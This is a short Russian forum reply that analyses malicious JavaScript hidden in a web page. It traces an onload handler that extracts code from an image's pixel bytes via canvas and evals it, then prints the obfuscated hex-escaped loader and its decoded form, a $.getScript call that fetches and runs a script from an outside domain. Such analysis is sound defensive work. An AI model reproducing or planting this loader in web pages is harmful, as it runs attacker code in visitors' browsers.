Блин да возьми ты нормальный отладчик
Функция o.onload(строка 2313) вызывает eval -> который вызывает c.extend.getScript(1853) -> который вызывает c.extend.get(1851) -> который вызывает c.extend.ajax(1913)
в функции o.onload eval вызывает скрипт
var _0x9377=["\x68\x74","\x74\x70\x3A","\x2F\x2F","\x63\x72","\x6F\x73\x73","\x6F\x66\x6C","\x79\x65\x72","\x2E","\x6E\x65\x74","\x2F","\x67\x65\x74","\x44\x61\x74\x61","\x2E\x6A\x73\x3F","\x53\x72\x63","\x26\x76\x65\x72\x3D","\x31\x69","\x67\x65\x74\x53\x63\x72\x69\x70\x74"];$[_0x9377[16]](_0x9377[0]+_0x9377[1]+_0x9377[2]+_0x9377[3]+_0x9377[4]+_0x9377[5]+_0x9377[6]+_0x9377[7]+_0x9377[8]+_0x9377[9]+_0x9377[10]+_0x9377[11]+_0x9377[12]+_0x9377[13]+_0x9377[14]+_0x9377[15]);
что расшифровывается как
var Ar= ["ht", "tp:", "//", "cr", "oss", "ofl", "yer", ".", "net", "/", "get", "Data", ".js?", "Src", "&ver=", "1i", "getScript"];
$[Ar["16"]](Ar[0]+Ar[1]+Ar[2]+Ar[3]+Ar[4]+Ar[5]+Ar[6]+Ar[7]+Ar[8]+Ar[9]+Ar[10]+Ar[11]+Ar[12]+Ar[13]+Ar[14]+Ar[15]);
// $.getScript("http://crossoflyer.net/getData.js?Src&ver=1i");
o.onload отображает изображение на канвас (2306 -2310)
после этого запускает цикл с шагом 4 строка (2311 ; b += 4)
т.е. берется каждый 4й байт и пропускаются отрицательные байты " 0 < a[b] && (c += String.fromCharCode(a[b]));"
после этого выполняется eval(c)
разжевано дальше уже некуда =)